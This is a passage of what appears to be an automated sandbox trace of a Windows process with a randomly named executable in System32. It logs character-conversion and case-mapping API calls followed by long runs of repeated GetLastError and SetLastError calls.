lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af8cc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.009] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af8cc, cbMultiByte=256, lpWideCharStr=0x2af208, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.009] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.009] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2aeff8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.009] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2af7cc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÎ'¹õ\x04ú*", lpUsedDefaultChar=0x0) returned 256 [0032.010] GetLastError () returned 0x0 [0032.010] SetLastError (dwErrCode=0x0) [0032.010] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af8cc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.010] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af8cc, cbMultiByte=256, lpWideCharStr=0x2af228, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.010] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.010] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2af018, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.010] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2af6cc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÎ'¹õ\x04ú*", lpUsedDefaultChar=0x0) returned 256 [0032.010] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.010] GetLastError () returned 0x0 [0032.010] SetLastError (dwErrCode=0x0) [0032.010] GetLastError () returned 0x0 [0032.010] SetLastError (dwErrCode=0x0) [0032.010] GetLastError () returned 0x0 [0032.010] SetLastError (dwErrCode=0x0) [0032.010] GetLastError () returned 0x0 [0032.010] SetLastError (dwErrCode=0x0) [0032.010] GetLastError () returned 0x0 [0032.010] SetLastError (dwErrCode=0x0) [0032.010] GetLastError () returned 0x0 [0032.010] SetLastError (dwErrCode=0x0) [0032.010] GetLastError () returned 0x0 [0032.010] SetLastError (dwErrCode=0x0) [0032.010] GetLastError () returned 0x0 [0032.010] SetLastError (dwErrCode=0x0) [0032.010] GetLastError () returned 0x0 [0032.010] SetLastError (dwErrCode=0x0) [0032.010] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.011] GetLastError () returned 0x0 [0032.011] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.012] SetLastError (dwErrCode=0x0) [0032.012] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.013] GetLastError () returned 0x0 [0032.013] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.014] GetLastError () returned 0x0 [0032.014] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.015] SetLastError (dwErrCode=0x0) [0032.015] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.016] GetLastError () returned 0x0 [0032.016] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.017] SetLastError (dwErrCode=0x0) [0032.017] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.018] SetLastError (dwErrCode=0x0) [0032.018] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.019] GetLastError () returned 0x0 [0032.019] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.020] GetLastError () returned 0x0 [0032.020] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.021] SetLastError (dwErrCode=0x0) [0032.021] GetLastError () returned 0x0 [0032.022] SetLastError (dwErrCode=0x0) [0032.022] GetLastError () returned 0x0 [0032.022] SetLastError (dwErrCode=0x0) [0032.022] GetLastError () returned 0x0 